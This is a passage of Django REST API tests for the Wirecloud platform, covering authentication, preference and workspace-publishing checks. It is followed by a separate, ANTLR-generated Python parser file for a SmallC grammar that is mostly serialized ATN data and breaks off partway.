self.assertIn('name', response_data)
self.assertIn('version', response_data)
def test_resource_collection_post_using_octet_stream_error(self):
url = reverse('wirecloud_showcase.resource_collection')
# Authenticate
self.client.login(username='admin', password='admin')
# Make the request
response = self.client.post(url, 'invalid content', content_type="application/octet-stream", HTTP_ACCEPT='application/json')
self.assertEqual(response.status_code, 400)
def test_resource_entry_read_requires_authentication(self):
url = reverse('wirecloud_showcase.resource_entry', kwargs={'vendor': 'Wirecloud', 'name': 'Test', 'version': '1.0'})
response = self.client.get(url, HTTP_ACCEPT='application/json')
self.assertEqual(response.status_code, 401)
def test_resource_entry_read(self):
resource_id = [
'Wirecloud',
'Test',
'1.0'
]
url = reverse('wirecloud_showcase.resource_entry', args=resource_id)
file_name = '_'.join(resource_id) + '.wgt'
local_dir = catalogue.wgt_deployer.get_base_dir(*resource_id)
dst_file = os.path.join(local_dir, file_name)
if not os.path.exists(local_dir):
os.makedirs(local_dir)
src_file = os.path.join(self.shared_test_data_dir, 'Wirecloud_Test_Selenium_1.0.wgt')
shutil.copy(src_file, dst_file)
# Authenticate
self.client.login(username='admin', password='admin')
# Make the request
response = self.client.get(url, HTTP_ACCEPT='application/json')
self.assertEqual(response.status_code, 200)
def test_resource_entry_delete_requires_authentication(self):
url = reverse('wirecloud_showcase.resource_entry', kwargs={'vendor': 'Wirecloud', 'name': 'Test', 'version': '1.0'})
response = self.client.delete(url, HTTP_ACCEPT='application/json')
self.assertEqual(response.status_code, 401)
def test_resource_entry_delete(self):
url = reverse('wirecloud_showcase.resource_entry', kwargs={'vendor': 'Wirecloud', 'name': 'Test', 'version': '1.0'})
self.client.login(username='admin', password='admin')
response = self.client.delete(url, HTTP_ACCEPT='application/json')
self.assertEqual(response.status_code, 204)
class ExtraApplicationMashupAPI(WirecloudTestCase):
fixtures = ('initial_data', 'selenium_test_data', 'user_with_workspaces')
tags = ('extra_rest_api',)
@classmethod
def setUpClass(cls):
super(ExtraApplicationMashupAPI, cls).setUpClass()
cls.client = Client()
cls._original_download_function = staticmethod(downloader.download_http_content)
downloader.download_http_content = LocalDownloader({
'http': {
'localhost:8001': os.path.join(os.path.dirname(wirecloud.commons.test.__file__), 'test-data', 'src'),
},
})
# catalogue deployer
cls.old_catalogue_deployer = catalogue.wgt_deployer
cls.catalogue_tmp_dir = mkdtemp()
catalogue.wgt_deployer = WgtDeployer(cls.catalogue_tmp_dir)
# showcase deployer
cls.old_deployer = showcase.wgt_deployer
cls.showcase_tmp_dir = mkdtemp()
showcase.wgt_deployer = WgtDeployer(cls.showcase_tmp_dir)
@classmethod
def tearDownClass(cls):
downloader.download_http_content = cls._original_download_function
# deployers
catalogue.wgt_deployer = cls.old_catalogue_deployer
shutil.rmtree(cls.catalogue_tmp_dir, ignore_errors=True)
showcase.wgt_deployer = cls.old_deployer
shutil.rmtree(cls.showcase_tmp_dir, ignore_errors=True)
super(ExtraApplicationMashupAPI, cls).tearDownClass()
def test_iwidget_collection_read_requires_authentication(self):
url = reverse('wirecloud.iwidget_collection', kwargs={'workspace_id': 2, 'tab_id': 101})
response = self.client.get(url, HTTP_ACCEPT='application/json')
self.assertEqual(response.status_code, 401)
self.assertTrue('WWW-Authenticate' in response)
def test_iwidget_collection_read(self):
url = reverse('wirecloud.iwidget_collection', kwargs={'workspace_id': 2, 'tab_id': 101})
# Authenticate
self.client.login(username='user_with_workspaces', password='admin')
response = self.client.get(url, HTTP_ACCEPT='application/json')
self.assertEqual(response.status_code, 200)
response_data = simplejson.loads(response.content)
self.assertTrue(isinstance(response_data, list))
def test_iwidget_entry_read_requires_authentication(self):
url = reverse('wirecloud.iwidget_entry', kwargs={'workspace_id': 2, 'tab_id': 101, 'iwidget_id': 2})
response = self.client.get(url, HTTP_ACCEPT='application/json')
self.assertEqual(response.status_code, 401)
self.assertTrue('WWW-Authenticate' in response)
def test_iwidget_entry_read(self):
url = reverse('wirecloud.iwidget_entry', kwargs={'workspace_id': 2, 'tab_id': 101, 'iwidget_id': 2})
# Authenticate
self.client.login(username='user_with_workspaces', password='admin')
response = self.client.get(url, HTTP_ACCEPT='application/json')
self.assertEqual(response.status_code, 200)
response_data = simplejson.loads(response.content)
self.assertTrue(isinstance(response_data, dict))
def test_platform_preference_collection_read_requires_authentication(self):
url = reverse('wirecloud.platform_preferences')
response = self.client.get(url, HTTP_ACCEPT='application/json')
self.assertEqual(response.status_code, 401)
self.assertTrue('WWW-Authenticate' in response)
def test_platform_preference_collection_read(self):
url = reverse('wirecloud.platform_preferences')
# Authenticate
self.client.login(username='user_with_workspaces', password='admin')
response = self.client.get(url, HTTP_ACCEPT='application/json')
self.assertEqual(response.status_code, 200)
response_data = simplejson.loads(response.content)
self.assertTrue(isinstance(response_data, dict))
def test_platform_preference_collection_post_requires_authentication(self):
url = reverse('wirecloud.platform_preferences')
data = {
'pref1': {'value': '5'},
'pref2': {'value': 'false'}
}
response = self.client.post(url, simplejson.dumps(data), content_type='application/json', HTTP_ACCEPT='application/json')
self.assertEqual(response.status_code, 401)
self.assertTrue('WWW-Authenticate' in response)
def test_platform_preference_collection_post(self):
url = reverse('wirecloud.platform_preferences')
# Authenticate
self.client.login(username='user_with_workspaces', password='admin')
data = {
'pref1': {'value': '5'},
'pref2': {'value': 'false'}
}
response = self.client.post(url, simplejson.dumps(data), content_type='application/json', HTTP_ACCEPT='application/json')
self.assertEqual(response.status_code, 204)
self.assertEqual(response.content, '')
def test_workspace_preference_collection_read_requires_authentication(self):
url = reverse('wirecloud.workspace_preferences', kwargs={'workspace_id': 2})
response = self.client.get(url, HTTP_ACCEPT='application/json')
self.assertEqual(response.status_code, 401)
self.assertTrue('WWW-Authenticate' in response)
def test_workspace_preference_collection_read(self):
url = reverse('wirecloud.workspace_preferences', kwargs={'workspace_id': 2})
# Authenticate
self.client.login(username='user_with_workspaces', password='admin')
response = self.client.get(url, HTTP_ACCEPT='application/json')
self.assertEqual(response.status_code, 200)
response_data = simplejson.loads(response.content)
self.assertTrue(isinstance(response_data, dict))
def test_workspace_preference_collection_post_requires_authentication(self):
url = reverse('wirecloud.workspace_preferences', kwargs={'workspace_id': 2})
data = {
'pref1': {'inherit': 'false', 'value': '5'},
'pref2': {'inherit': 'true', 'value': 'false'}
}
response = self.client.post(url, simplejson.dumps(data), content_type='application/json', HTTP_ACCEPT='application/json')
self.assertEqual(response.status_code, 401)
self.assertTrue('WWW-Authenticate' in response)
def test_workspace_preference_collection_post(self):
url = reverse('wirecloud.workspace_preferences', kwargs={'workspace_id': 2})
# Authenticate
self.client.login(username='user_with_workspaces', password='admin')
data = {
'pref1': {'inherit': 'false', 'value': '5'},
'pref2': {'inherit': 'true', 'value': 'false'}
}
response = self.client.post(url, simplejson.dumps(data), content_type='application/json', HTTP_ACCEPT='application/json')
self.assertEqual(response.status_code, 204)
self.assertEqual(response.content, '')
def test_tab_preference_collection_read_requires_authentication(self):
url = reverse('wirecloud.tab_preferences', kwargs={'workspace_id': 2, 'tab_id': 101})
response = self.client.get(url, HTTP_ACCEPT='application/json')
self.assertEqual(response.status_code, 401)
self.assertTrue('WWW-Authenticate' in response)
def test_tab_preference_collection_read(self):
url = reverse('wirecloud.tab_preferences', kwargs={'workspace_id': 2, 'tab_id': 101})
# Authenticate
self.client.login(username='user_with_workspaces', password='admin')
response = self.client.get(url, HTTP_ACCEPT='application/json')
self.assertEqual(response.status_code, 200)
response_data = simplejson.loads(response.content)
self.assertTrue(isinstance(response_data, dict))
def test_tab_preference_collection_post_requires_authentication(self):
url = reverse('wirecloud.tab_preferences', kwargs={'workspace_id': 2, 'tab_id': 101})
data = {
'pref1': {'inherit': 'false', 'value': '5'},
'pref2': {'inherit': 'true', 'value': 'false'}
}
response = self.client.post(url, simplejson.dumps(data), content_type='application/json', HTTP_ACCEPT='application/json')
self.assertEqual(response.status_code, 401)
self.assertTrue('WWW-Authenticate' in response)
def test_tab_preference_collection_post(self):
url = reverse('wirecloud.tab_preferences', kwargs={'workspace_id': 2, 'tab_id': 101})
# Authenticate
self.client.login(username='user_with_workspaces', password='admin')
data = {
'pref1': '5',
'pref2': 'true',
}
response = self.client.post(url, simplejson.dumps(data), content_type='application/json', HTTP_ACCEPT='application/json')
self.assertEqual(response.status_code, 204)
self.assertEqual(response.content, '')
def test_workspace_publish_requires_authentication(self):
url = reverse('wirecloud.workspace_publish', kwargs={'workspace_id': 2})
data = {
'vendor': 'Wirecloud',
'name': 'test-published-mashup',
'version': '1.0.5',
'email': 'test@example.com'
}
response = self.client.post(url, simplejson.dumps(data), content_type='application/json', HTTP_ACCEPT='application/json')
self.assertEqual(response.status_code, 401)
self.assertTrue('WWW-Authenticate' in response)
def test_workspace_publish(self):
url = reverse('wirecloud.workspace_publish', kwargs={'workspace_id': 2})
# Authenticate
self.client.login(username='user_with_workspaces', password='admin')
data = {
'vendor': 'Wirecloud',
'name': 'test-published-mashup',
'version': '1.0.5',
'email': 'test@example.com'
}
response = self.client.post(url, simplejson.dumps(data), content_type='application/json', HTTP_ACCEPT='application/json')
self.assertEqual(response.status_code, 201)
def test_workspace_publish_bad_provided_data(self):
url = reverse('wirecloud.workspace_publish', kwargs={'workspace_id': 2})
# Authenticate
self.client.login(username='user_with_workspaces', password='admin')
# Test missing parameters
data = {
'name': ''
}
response = self.client.post(url, simplejson.dumps(data), content_type='application/json', HTTP_ACCEPT='application/json')
self.assertEqual(response.status_code, 400)
response_data = simplejson.loads(response.content)
self.assertTrue(isinstance(response_data, dict))
# Test invalid version
data = {
'vendor': 'Wirecloud',
'name': 'test-published-mashup',
'version': '1.0.05',
'email': 'test@example.com'
}
response = self.client.post(url, simplejson.dumps(data), content_type='application/json', HTTP_ACCEPT='application/json')
self.assertEqual(response.status_code, 400)
response_data = simplejson.loads(response.content)
self.assertTrue(isinstance(response_data, dict))
|
# Generated from SmallC.g4 by ANTLR 4.5.3
# encoding: utf-8
from antlr4 import *
from io import StringIO
def serializedATN():
with StringIO() as buf:
buf.write("\3\u0430\ud6d1\u8206\uad2d\u4417\uaef1\u8d80\uaadd\38")
buf.write("\u0229\4\2\t\2\4\3\t\3\4\4\t\4\4\5\t\5\4\6\t\6\4\7\t\7")
buf.write("\4\b\t\b\4\t\t\t\4\n\t\n\4\13\t\13\4\f\t\f\4\r\t\r\4\16")
buf.write("\t\16\4\17\t\17\4\20\t\20\4\21\t\21\4\22\t\22\4\23\t\23")
buf.write("\4\24\t\24\4\25\t\25\4\26\t\26\4\27\t\27\4\30\t\30\4\31")
buf.write("\t\31\4\32\t\32\4\33\t\33\4\34\t\34\4\35\t\35\4\36\t\36")
buf.write("\4\37\t\37\4 \t \4!\t!\4\"\t\"\4#\t#\4$\t$\4%\t%\4&\t")
buf.write("&\4\'\t\'\4(\t(\4)\t)\4*\t*\4+\t+\4,\t,\4-\t-\4.\t.\4")
buf.write("/\t/\4\60\t\60\4\61\t\61\4\62\t\62\4\63\t\63\4\64\t\64")
buf.write("\3\2\3\2\3\3\3\3\3\3\3\3\3\3\5\3p\n\3\3\4\3\4\3\4\3\4")
buf.write("\3\4\3\4\3\4\5\4y\n\4\3\5\3\5\3\5\3\5\3\5\3\5\7\5\u0081")
buf.write("\n\5\f\5\16\5\u0084\13\5\3\6\3\6\3\6\3\6\3\6\3\6\7\6\u008c")
buf.write("\n\6\f\6\16\6\u008f\13\6\3\7\3\7\3\b\3\b\3\t\3\t\3\n\3")
buf.write("\n\3\n\3\n\3\n\3\n\3\n\3\n\3\n\7\n\u00a0\n\n\f\n\16\n")
buf.write("\u00a3\13\n\3\13\3\13\3\13\3\13\3\13\3\13\3\13\3\13\3")
buf.write("\13\3\13\3\13\3\13\3\13\3\13\3\13\7\13\u00b4\n\13\f\13")
buf.write("\16\13\u00b7\13\13\3\f\3\f\3\r\3\r\3\r\3\r\3\r\3\r\3\r")
buf.write("\3\r\3\r\7\r\u00c4\n\r\f\r\16\r\u00c7\13\r\3\16\3\16\3")
buf.write("\16\3\16\3\16\3\16\3\16\3\16\3\16\3\16\3\16\3\16\7\16")
buf.write("\u00d5\n\16\f\16\16\16\u00d8\13\16\3\17\3\17\3\17\3\17")
buf.write("\3\17\3\17\3\17\3\17\3\17\3\17\3\17\3\17\3\17\3\17\3\17")
buf.write("\3\17\3\17\3\17\3\17\3\17\3\17\5\17\u00ef\n\17\3\20\3")
buf.write("\20\3\20\3\20\3\20\3\20\3\20\3\20\3\20\3\20\5\20\u00fb")
buf.write("\n\20\3\20\3\20\3\20\3\20\3\20\3\20\3\20\3\20\3\20\7\20")
buf.write("\u0106\n\20\f\20\16\20\u0109\13\20\3\21\3\21\3\21\3\21")
buf.write("\3\21\3\21\7\21\u0111\n\21\f\21\16\21\u0114\13\21\3\22")
buf.write("\3\22\3\22\3\22\3\22\3\22\3\22\5\22\u011d\n\22\3\23\3")
buf.write("\23\3\23\3\23\3\24\3\24\3\25\6\25\u0126\n\25\r\25\16\25")
buf.write("\u0127\3\25\7\25\u012b\n\25\f\25\16\25\u012e\13\25\3\25")
buf.write("\3\25\3\25\3\25\3\25\3\25\3\26\6\26\u0137\n\26\r\26\16")
buf.write("\26\u0138\3\26\7\26\u013c\n\26\f\26\16\26\u013f\13\26")
buf.write("\3\26\3\26\3\26\3\26\3\26\3\26\3\27\3\27\3\27\3\27\7\27")
buf.write("\u014b\n\27\f\27\16\27\u014e\13\27\3\27\5\27\u0151\n\27")
buf.write("\3\30\6\30\u0154\n\30\r\30\16\30\u0155\3\30\7\30\u0159")
buf.write("\n\30\f\30\16\30\u015c\13\30\3\30\5\30\u015f\n\30\3\30")
buf.write("\5\30\u0162\n\30\3\31\3\31\5\31\u0166\n\31\3\32\3\32\5")
buf.write("\32\u016a\n\32\3\32\3\32\3\33\3\33\7\33\u0170\n\33\f\33")
buf.write("\16\33\u0173\13\33\3\33\3\33\3\34\3\34\3\34\3\34\3\34")
buf.write("\3\34\3\34\3\34\3\34\3\34\3\34\3\34\3\34\3\34\3\34\5\34")
buf.write("\u0186\n\34\3\35\3\35\3\35\3\35\3\35\3\35\3\35\5\35\u018f")
buf.write("\n\35\3\36\3\36\3\36\3\36\3\36\3\36\5\36\u0197\n\36\3")
buf.write("\37\3\37\3\37\3 \3 \3 \3 \3 \3 \3!\3!\3!\3!\3!\3!\3!\3")
buf.write("!\3\"\3\"\3\"\3\"\5\"\u01ae\n\"\3\"\3\"\3\"\3\"\3\"\3")
buf.write("\"\3\"\3#\6#\u01b8\n#\r#\16#\u01b9\3#\3#\3#\7#\u01bf\n")
buf.write("#\f#\16#\u01c2\13#\3$\3$\5$\u01c6\n$\3%\3%\3&\3&\3&\3")
buf.write("&\3&\5&\u01cf\n&\3&\3&\3&\5&\u01d4\n&\5&\u01d6\n&\3\'")
buf.write("\3\'\3\'\3\'\3\'\3\'\5\'\u01de\n\'\5\'\u01e0\n\'\3(\3")
buf.write("(\3(\3(\3(\7(\u01e7\n(\f(\16(\u01ea\13(\3(\3(\6(\u01ee")
buf.write("\n(\r(\16(\u01ef\3(\3(\5(\u01f4\n(\3)\3)\3)\3)\7)\u01fa")
buf.write("\n)\f)\16)\u01fd\13)\5)\u01ff\n)\3)\3)\5)\u0203\n)\3*")
buf.write("\3*\5*\u0207\n*\3+\3+\3+\7+\u020c\n+\f+\16+\u020f\13+")
buf.write("\3+\5+\u0212\n+\3,\3,\3,\3,\3,\3-\3-\3.\3.\3/\3/\3\60")
buf.write("\3\60\3\61\3\61\3\62\3\62\3\63\3\63\3\64\3\64\3\64\2\t")
buf.write("\b\n\22\24\30\32\36\65\2\4\6\b\n\f\16\20\22\24\26\30\32")
buf.write("\34\36 \"$&(*,.\60\62\64\668:<>@BDFHJLNPRTVXZ\\^`bdf\2")
buf.write("\3\3\2\"%\u024a\2h\3\2\2\2\4o\3\2\2\2\6x\3\2\2\2\bz\3")
buf.write("\2\2\2\n\u0085\3\2\2\2\f\u0090\3\2\2\2\16\u0092\3\2\2")
buf.write("\2\20\u0094\3\2\2\2\22\u0096\3\2\2\2\24\u00a4\3\2\2\2")
buf.write("\26\u00b8\3\2\2\2\30\u00ba\3\2\2\2\32\u00c8\3\2\2\2\34")
buf.write("\u00ee\3\2\2\2\36\u00fa\3\2\2\2 \u0112\3\2\2\2\"\u011c")
buf.write("\3\2\2\2$\u011e\3\2\2\2&\u0122\3\2\2\2(\u0125\3\2\2\2")
buf.write("*\u0136\3\2\2\2,\u0150\3\2\2\2.\u0153\3\2\2\2\60\u0163")
buf.write("\3\2\2\2\62\u0167\3\2\2\2\64\u016d\3\2\2\2\66\u0185\3")
buf.write("\2\2\28\u018e\3\2\2\2:\u0190\3\2\2\2<\u0198\3\2\2\2>\u019b")
buf.write("\3\2\2\2@\u01a1\3\2\2\2B\u01a9\3\2\2\2D\u01b7\3\2\2\2")
buf.write("F\u01c5\3\2\2\2H\u01c7\3\2\2\2J\u01d5\3\2\2\2L\u01df\3")
buf.write("\2\2\2N\u01f3\3\2\2\2P\u0202\3\2\2\2R\u0204\3\2\2\2T\u0211")
buf.write("\3\2\2\2V\u0213\3\2\2\2X\u0218\3\2\2\2Z\u021a\3\2\2\2")
buf.write("\\\u021c\3\2\2\2^\u021e\3\2\2\2`\u0220\3\2\2\2b\u0222")
buf.write("\3\2\2\2d\u0224\3\2\2\2f\u0226\3\2\2\2hi\5\4\3\2i\3\3")
buf.write("\2\2\2jk\5\6\4\2kl\7\3\2\2lm\5\4\3\2mp\3\2\2\2np\5\6\4")
buf.write("\2oj\3\2\2\2on\3\2\2\2p\5\3\2\2\2qr\5\b\5\2rs\7\4\2\2")
buf.write("st\5\b\5\2tu\7\5\2\2uv\5\6\4\2vy\3\2\2\2wy\5\b\5\2xq\3")
buf.write("\2\2\2xw\3\2\2\2y\7\3\2\2\2z{\b\5\1\2{|\5\n\6\2|\u0082")
buf.write("\3\2\2\2}~\f\4\2\2~\177\7\6\2\2\177\u0081\5\n\6\2\u0080")
buf.write("}\3\2\2\2\u0081\u0084\3\2\2\2\u0082\u0080\3\2\2\2\u0082")
buf.write("\u0083\3\2\2\2\u0083\t\3\2\2\2\u0084\u0082\3\2\2\2\u0085")
buf.write("\u0086\b\6\1\2\u0086\u0087\5\22\n\2\u0087\u008d\3\2\2")
buf.write("\2\u0088\u0089\f\4\2\2\u0089\u008a\7\7\2\2\u008a\u008c")
buf.write("\5\22\n\2\u008b\u0088\3\2\2\2\u008c\u008f\3\2\2\2\u008d")
buf.write("\u008b\3\2\2\2\u008d\u008e\3\2\2\2\u008e\13\3\2\2\2\u008f")
buf.write("\u008d\3\2\2\2\u0090\u0091\5\16\b\2\u0091\r\3\2\2\2\u0092")
buf.write("\u0093\5\20\t\2\u0093\17\3\2\2\2\u0094\u0095\5\22\n\2")
buf.write("\u0095\21\3\2\2\2\u0096\u0097\b\n\1\2\u0097\u0098\5\24")
buf.write("\13\2\u0098\u00a1\3\2\2\2\u0099\u009a\f\5\2\2\u009a\u009b")
buf.write("\7\b\2\2\u009b\u00a0\5\24\13\2\u009c\u009d\f\4\2\2\u009d")
buf.write("\u009e\7\t\2\2\u009e\u00a0\5\24\13\2\u009f\u0099\3\2\2")
buf.write("\2\u009f\u009c\3\2\2\2\u00a0\u00a3\3\2\2\2\u00a1\u009f")
buf.write("\3\2\2\2\u00a1\u00a2\3\2\2\2\u00a2\23\3\2\2\2\u00a3\u00a1")
buf.write("\3\2\2\2\u00a4\u00a5\b\13\1\2\u00a5\u00a6\5\30\r\2\u00a6")
buf.write("\u00b5\3\2\2\2\u00a7\u00a8\f\7\2\2\u00a8\u00a9\7\33\2")
buf.write("\2\u00a9\u00b4\5\30\r\2\u00aa\u00ab\f\6\2\2\u00ab\u00ac")
buf.write("\7\n\2\2\u00ac\u00b4\5\30\r\2\u00ad\u00ae\f\5\2\2\u00ae")
buf.write("\u00af\7\34\2\2\u00af\u00b4\5\30\r\2\u00b0\u00b1\f\4\2")
buf.write("\2\u00b1\u00b2\7\13\2\2\u00b2\u00b4\5\30\r\2\u00b3\u00a7")
buf.write("\3\2\2\2\u00b3\u00aa\3\2\2\2\u00b3\u00ad\3\2\2\2\u00b3")
buf.write("\u00b0\3\2\2\2\u00b4\u00b7\3\2\2\2\u00b5\u00b3\3\2\2\2")
buf.write("\u00b5\u00b6\3\2\2\2\u00b6\25\3\2\2\2\u00b7\u00b5\3\2")
buf.write("\2\2\u00b8\u00b9\5\30\r\2\u00b9\27\3\2\2\2\u00ba\u00bb")
buf.write("\b\r\1\2\u00bb\u00bc\5\32\16\2\u00bc\u00c5\3\2\2\2\u00bd")
buf.write("\u00be\f\5\2\2\u00be\u00bf\7\f\2\2\u00bf\u00c4\5\32\16")
buf.write("\2\u00c0\u00c1\f\4\2\2\u00c1\u00c2\7\r\2\2\u00c2\u00c4")
buf.write("\5\32\16\2\u00c3\u00bd\3\2\2\2\u00c3\u00c0\3\2\2\2\u00c4")
buf.write("\u00c7\3\2\2\2\u00c5\u00c3\3\2\2\2\u00c5\u00c6\3\2\2\2")
buf.write("\u00c6\31\3\2\2\2\u00c7\u00c5\3\2\2\2\u00c8\u00c9\b\16")
buf.write("\1\2\u00c9\u00ca\5\34\17\2\u00ca\u00d6\3\2\2\2\u00cb\u00cc")
buf.write("\f\6\2\2\u00cc\u00cd\7\16\2\2\u00cd\u00d5\5\34\17\2\u00ce")
buf.write("\u00cf\f\5\2\2\u00cf\u00d0\7\17\2\2\u00d0\u00d5\5\34\17")
buf.write("\2\u00d1\u00d2\f\4\2\2\u00d2\u00d3\7\20\2\2\u00d3\u00d5")
buf.write("\5\34\17\2\u00d4\u00cb\3\2\2\2\u00d4\u00ce\3\2\2\2\u00d4")
buf.write("\u00d1\3\2\2\2\u00d5\u00d8\3\2\2\2\u00d6\u00d4\3\2\2\2")
buf.write("\u00d6\u00d7\3\2\2\2\u00d7\33\3\2\2\2\u00d8\u00d6\3\2")
buf.write("\2\2\u00d9\u00da\7\21\2\2\u00da\u00ef\5\34\17\2\u00db")
buf.write("\u00dc\7\22\2\2\u00dc\u00ef\5\34\17\2\u00dd\u00de\7\f")
buf.write("\2\2\u00de\u00ef\5\34\17\2\u00df\u00e0\7\r\2\2\u00e0\u00ef")
buf.write("\5\34\17\2\u00e1\u00e2\7\23\2\2\u00e2\u00ef\5\36\20\2")
buf.write("\u00e3\u00e4\7\16\2\2\u00e4\u00ef\5\34\17\2\u00e5\u00e6")
buf.write("\7\24\2\2\u00e6\u00ef\5\34\17\2\u00e7\u00ef\5V,\2\u00e8")
buf.write("\u00e9\7\31\2\2\u00e9\u00ea\5^\60\2\u00ea\u00eb\7\32\2")
buf.write("\2\u00eb\u00ec\5\34\17\2\u00ec\u00ef\3\2\2\2\u00ed\u00ef")
buf.write("\5\36\20\2\u00ee\u00d9\3\2\2\2\u00ee\u00db\3\2\2\2\u00ee")
buf.write("\u00dd\3\2\2\2\u00ee\u00df\3\2\2\2\u00ee\u00e1\3\2\2\2")
buf.write("\u00ee\u00e3\3\2\2\2\u00ee\u00e5\3\2\2\2\u00ee\u00e7\3")
buf.write("\2\2\2\u00ee\u00e8\3\2\2\2\u00ee\u00ed\3\2\2\2\u00ef\35")
buf.write("\3\2\2\2\u00f0\u00f1\b\20\1\2\u00f1\u00fb\5X-\2\u00f2")
buf.write("\u00fb\5`\61\2\u00f3\u00fb\5b\62\2\u00f4\u00fb\5d\63\2")
buf.write("\u00f5\u00fb\5f\64\2\u00f6\u00f7\7\31\2\2\u00f7\u00f8")
buf.write("\58\35\2\u00f8\u00f9\7\32\2\2\u00f9\u00fb\3\2\2\2\u00fa")
buf.write("\u00f0\3\2\2\2\u00fa\u00f2\3\2\2\2\u00fa\u00f3\3\2\2\2")
buf.write("\u00fa\u00f4\3\2\2\2\u00fa\u00f5\3\2\2\2\u00fa\u00f6\3")
buf.write("\2\2\2\u00fb\u0107\3\2\2\2\u00fc\u00fd\f\13\2\2\u00fd")
buf.write("\u0106\7\21\2\2\u00fe\u00ff\f\n\2\2\u00ff\u0106\7\22\2")
buf.write("\2\u0100\u0101\f\t\2\2\u0101\u0102\7\37\2\2\u0102\u0103")
buf.write("\58\35\2\u0103\u0104\7 \2\2\u0104\u0106\3\2\2\2\u0105")
buf.write("\u00fc\3\2\2\2\u0105\u00fe\3\2\2\2\u0105\u0100\3\2\2\2")
buf.write("\u0106\u0109\3\2\2\2\u0107\u0105\3\2\2\2\u0107\u0108\3")
buf.write("\2\2\2\u0108\37\3\2\2\2\u0109\u0107\3\2\2\2\u010a\u0111")
buf.write("\5\"\22\2\u010b\u0111\5(\25\2\u010c\u0111\5*\26\2\u010d")
buf.write("\u010e\5D#\2\u010e\u010f\7\25\2\2\u010f\u0111\3\2\2\2")
buf.write("\u0110\u010a\3\2\2\2\u0110\u010b\3\2\2\2\u0110\u010c\3")
buf.write("\2\2\2\u0110\u010d\3\2\2\2\u0111\u0114\3\2\2\2\u0112\u0110")
buf.write("\3\2\2\2\u0112\u0113\3\2\2\2\u0113!\3\2\2\2\u0114\u0112")
buf.write("\3\2\2\2\u0115\u0116\7\26\2\2\u0116\u0117\7\33\2\2\u0117")
buf.write("\u0118\5$\23\2\u0118\u0119\7\34\2\2\u0119\u011d\3\2\2")
buf.write("\2\u011a\u011b\7\26\2\2\u011b\u011d\5&\24\2\u011c\u0115")
buf.write("\3\2\2\2\u011c\u011a\3\2\2\2\u011d#\3\2\2\2\u011e\u011f")
buf.write("\5Z.\2\u011f\u0120\7\27\2\2\u0120\u0121\5Z.\2\u0121%\3")
buf.write("\2\2\2\u0122\u0123\5f\64\2\u0123\'\3\2\2\2\u0124\u0126")
buf.write("\5F$\2\u0125\u0124\3\2\2\2\u0126\u0127\3\2\2\2\u0127\u0125")
buf.write("\3\2\2\2\u0127\u0128\3\2\2\2\u0128\u012c\3\2\2\2\u0129")
buf.write("\u012b\5\60\31\2\u012a\u0129\3\2\2\2\u012b\u012e\3\2\2")
buf.write("\2\u012c\u012a\3\2\2\2\u012c\u012d\3\2\2\2\u012d\u012f")
buf.write("\3\2\2\2\u012e\u012c\3\2\2\2\u012f\u0130\5Z.\2\u0130\u0131")
buf.write("\7\31\2\2\u0131\u0132\5,\27\2\u0132\u0133\7\32\2\2\u0133")
buf.write("\u0134\7\25\2\2\u0134)\3\2\2\2\u0135\u0137\5F$\2\u0136")
buf.write("\u0135\3\2\2\2\u0137\u0138\3\2\2\2\u0138\u0136\3\2\2\2")
buf.write("\u0138\u0139\3\2\2\2\u0139\u013d\3\2\2\2\u013a\u013c\5")
buf.write("\60\31\2\u013b\u013a\3\2\2\2\u013c\u013f\3\2\2\2\u013d")
buf.write("\u013b\3\2\2\2\u013d\u013e\3\2\2\2\u013e\u0140\3\2\2\2")
buf.write("\u013f\u013d\3\2\2\2\u0140\u0141\5Z.\2\u0141\u0142\7\31")
buf.write("\2\2\u0142\u0143\5,\27\2\u0143\u0144\7\32\2\2\u0144\u0145")
buf.write("\5\64\33\2\u0145+\3\2\2\2\u0146\u0151\3\2\2\2\u0147\u014c")
buf.write("\5.\30\2\u0148\u0149\7\30\2\2\u0149\u014b\5.\30\2\u014a")
buf.write("\u0148\3\2\2\2\u014b\u014e\3\2\2\2\u014c\u014a\3\2\2\2")
buf.write("\u014c\u014d\3\2\2\2\u014d\u0151\3\2\2\2\u014e\u014c\3")
buf.write("\2\2\2\u014f\u0151\3\2\2\2\u0150\u0146\3\2\2\2\u0150\u0147")
buf.write("\3\2\2\2\u0150\u014f\3\2\2\2\u0151-\3\2\2\2\u0152\u0154")
buf.write("\5F$\2\u0153\u0152\3\2\2\2\u0154\u0155\3\2\2\2\u0155\u0153")
buf.write("\3\2\2\2\u0155\u0156\3\2\2\2\u0156\u015a\3\2\2\2\u0157")
buf.write("\u0159\5\60\31\2\u0158\u0157\3\2\2\2\u0159\u015c\3\2\2")
buf.write("\2\u015a\u0158\3\2\2\2\u015a\u015b\3\2\2\2\u015b\u015e")
buf.write("\3\2\2\2\u015c\u015a\3\2\2\2\u015d\u015f\5Z.\2\u015e\u015d")
buf.write("\3\2\2\2\u015e\u015f\3\2\2\2\u015f\u0161\3\2\2\2\u0160")
buf.write("\u0162\5\62\32\2\u0161\u0160\3\2\2\2\u0161\u0162\3\2\2")
buf.write("\2\u0162/\3\2\2\2\u0163\u0165\5\\/\2\u0164\u0166\5H%\2")
buf.write("\u0165\u0164\3\2\2\2\u0165\u0166\3\2\2\2\u0166\61\3\2")
buf.write("\2\2\u0167\u0169\7\37\2\2\u0168\u016a\58\35\2\u0169\u0168")
buf.write("\3\2\2\2\u0169\u016a\3\2\2\2\u016a\u016b\3\2\2\2\u016b")
buf.write("\u016c\7 \2\2\u016c\63\3\2\2\2\u016d\u0171\7\35\2\2\u016e")
buf.write("\u0170\5\66\34\2\u016f\u016e\3\2\2\2\u0170\u0173\3\2\2")
buf.write("\2\u0171\u016f\3\2\2\2\u0171\u0172\3\2\2\2\u0172\u0174")
buf.write("\3\2\2\2\u0173\u0171\3\2\2\2\u0174\u0175\7\36\2\2\u0175")
buf.write("\65\3\2\2\2\u0176\u0186\5\64\33\2\u0177\u0186\5:\36\2")
buf.write("\u0178\u0186\5> \2\u0179\u0186\5@!\2\u017a\u0186\5B\"")
buf.write("\2\u017b\u017c\58\35\2\u017c\u017d\7\25\2\2\u017d\u0186")
buf.write("\3\2\2\2\u017e\u017f\5D#\2\u017f\u0180\7\25\2\2\u0180")
buf.write("\u0186\3\2\2\2\u0181\u0182\5R*\2\u0182\u0183\7\25\2\2")
buf.write("\u0183\u0186\3\2\2\2\u0184\u0186\7\25\2\2\u0185\u0176")
buf.write("\3\2\2\2\u0185\u0177\3\2\2\2\u0185\u0178\3\2\2\2\u0185")
buf.write("\u0179\3\2\2\2\u0185\u017a\3\2\2\2\u0185\u017b\3\2\2\2")
